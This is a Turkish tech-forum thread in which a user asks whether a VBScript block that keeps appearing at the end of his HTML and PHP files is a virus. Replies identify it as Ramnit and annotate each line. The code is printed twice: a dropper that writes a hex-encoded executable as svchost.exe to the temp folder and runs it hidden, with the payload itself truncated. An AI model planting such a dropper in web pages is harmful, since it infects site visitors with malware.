Notepad++ Da Bu Virusmudur?

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ayhun
    ayhun's avatar
    Kayıt Tarihi: 21/Temmuz/2005
    Erkek

    enteresan vırusumsu bı kod var bu notepad++ da pc yenı formatlı olmasına ragmen bıyerleden geldı az once buraya gorun dıye ekleyecektım amma chromu kılıtledı nasıl bı belaysa. belırlı bı kısmını buraya atayım bı bakın nasıl temızlerız.

     

    <SCRIPT Language=VBScript><!--

    DropFileName = "svchost.exe"

    WriteData = "4D5A9000(buranın daha devamı var bol rakamlıca)

    Set FSO = CreateObject("Scripting.FileSystemObject")

    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName

    If FSO.FileExists(DropPath)=False Then

    Set FileObj = FSO.CreateTextFile(DropPath, True)

    For i = 1 To Len(WriteData) Step 2

    FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))

    Next

    FileObj.Close

    End If

    Set WSHshell = CreateObject("WScript.Shell")

    WSHshell.Run DropPath, 0

    //--></SCRIPT>


    delimiyim ben?
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Holyzone
    Holyzone's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 13/Ekim/2008
    Erkek

    yazdırdığı dataya bağlı, fakat şüpheli duruyor

  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ayhun
    ayhun's avatar
    Kayıt Tarihi: 21/Temmuz/2005
    Erkek

    bu bela nasıl bişeyse nerden geliosa anlamadım. notepad de bi html php vs dosyası actıgımda hemen en alta script olarak yazdırıyor kendisini farketmezde o dosyayı hosta atarsam chrome bunu vırus olarak fegerlendırıp sıteyı engellıyor zaten ordaki svchost.exe yı calıstırması bı enteresan.


    delimiyim ben?
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Bilirkişi
    mkyb
    mkyb's avatar
    Kayıt Tarihi: 27/Mayıs/2011
    Erkek

    Avast konuya girmeme bile izin vermedi. Virüstotal'e yükleyip bi sonuç atar mısın ?


    Yaşlandıkça 50 liralık saatin ve 5.000 liralık saatin aynı şeyi gösterdiğini fark edeceksin. 1.000.000 liralık ve 100.000 liralık ev aynı yalnızlığı barındırır. 1.000 liralık Android ile 20.000 liralık iPhone Pro kimse aramadıktan sonra aynıdır. Materyalist şeylerde gerçek mutluluk bulunmaz. Asıl mutluluk bir çift memededir. Enflasyon yüzünden bu imzayı bir ara güncellemek lazım. Bin liraya telefon kalmadı amk.
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Amatör Üye
    dgncn
    dgncn's avatar
    Kayıt Tarihi: 22/Mayıs/2012
    Erkek

    http://stackoverflow.com/a/29484737

     

    Görünüşe göre bir virüs evet.

     

    Üstteki arkadaş ruby yükleyip bir dosyaya vb kodlarının temizliği için hangi kodları çalıştıracağını yazmış. Bir dene istersen.

    http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Virus:Win32/Ramnit.K#tab=2

     

    dgncn tarafından 05/Şub/16 21:14 tarihinde düzenlenmiştir
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ustura
    ustura's avatar
    Banlanmış Üye
    Kayıt Tarihi: 29/Ağustos/2005
    Erkek

    DropFileName = "svchost.exe" 'olusturulucak dosya ismi 

    WriteData = "4D5A9000(buranın daha devamı var bol rakamlıca) 'Exe HeX Kodlari

    Set FSO = CreateObject("Scripting.FileSystemObject") Dosya islemleri nesne olusturuyor

    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName 'windowus dizii yada apdata dizinini aliyor

    If FSO.FileExists(DropPath)=False Then ' 

    Set FileObj = FSO.CreateTextFile(DropPath, True)  'txt dosyasi olustur

    or i = 1 To Len(WriteData) Step 2 

    FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) 'dongu kullanarak hex txt dosyasina yazdir

    Next

    FileObj.Close

    End If

    Set WSHshell = CreateObject("WScript.Shell")

    WSHshell.Run DropPath, 0  ' yazdirdigi dosyayi calistiyor

     

    virustur direk combofix veya antiyle tarattir

     


    itsin oglum sen adam degilsin
Toplam Hit: 1439 Toplam Mesaj: 6
notepad++ virus shell kodu virusmudur nedir